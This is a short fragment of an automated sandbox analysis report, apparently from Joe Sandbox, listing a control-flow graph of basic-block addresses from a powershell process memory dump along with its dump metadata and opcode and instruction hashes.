                                                                  control_flow_graph 260 7ff7c01c3413-7ff7c01c3464 261 7ff7c01c346a-7ff7c01c3474 260->261 262 7ff7c01c36cc-7ff7c01c378b 260->262 263 7ff7c01c3476-7ff7c01c3483 261->263 264 7ff7c01c348d-7ff7c01c3492 261->264 263->264 269 7ff7c01c3485-7ff7c01c348b 263->269 265 7ff7c01c3670-7ff7c01c367a 264->265 266 7ff7c01c3498-7ff7c01c349b 264->266 272 7ff7c01c3689-7ff7c01c36c9 265->272 273 7ff7c01c367c-7ff7c01c3688 265->273 270 7ff7c01c34b2 266->270 271 7ff7c01c349d-7ff7c01c34b0 266->271 269->264 276 7ff7c01c34b4-7ff7c01c34b6 270->276 271->276 272->262 276->265 279 7ff7c01c34bc-7ff7c01c34f0 276->279 290 7ff7c01c34f2-7ff7c01c3505 279->290 291 7ff7c01c3507 279->291 294 7ff7c01c3509-7ff7c01c350b 290->294 291->294 294->265 295 7ff7c01c3511-7ff7c01c3519 294->295 295->262 297 7ff7c01c351f-7ff7c01c3529 295->297 298 7ff7c01c3545-7ff7c01c3555 297->298 299 7ff7c01c352b-7ff7c01c3543 297->299 298->265 303 7ff7c01c355b-7ff7c01c358c 298->303 299->298 303->265 308 7ff7c01c3592-7ff7c01c35be 303->308 312 7ff7c01c35c0-7ff7c01c35e7 308->312 313 7ff7c01c35e9 308->313 314 7ff7c01c35eb-7ff7c01c35ed 312->314 313->314 314->265 315 7ff7c01c35f3-7ff7c01c35fb 314->315 317 7ff7c01c35fd-7ff7c01c3607 315->317 318 7ff7c01c360b 315->318 319 7ff7c01c3609 317->319 320 7ff7c01c3627-7ff7c01c3656 317->320 322 7ff7c01c3610-7ff7c01c3625 318->322 319->322 326 7ff7c01c365d-7ff7c01c366f 320->326 322->320
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1874612537.00007FF7C01C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff7c01c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 39d315eea469246f75c608c6a5f070642e69615e8b8e435ae5b36ac669c1d734
                                                                  • Instruction ID: cb3d6ab84f29e8c4c658c6919f5f81948023a3f5fd6e2df46e61029e34561ec1
                                                                  • Opcode Fuzzy Hash: 39d315eea469246f75c608c6a5f070642e69615e8b8e435ae5b36ac669c1d734
                                                                  • Instruction Fuzzy Hash: 9DC12531A0EAC95FE755EF2858155BDFB90FF06724B4802BED04DC7293DA18E805C7A1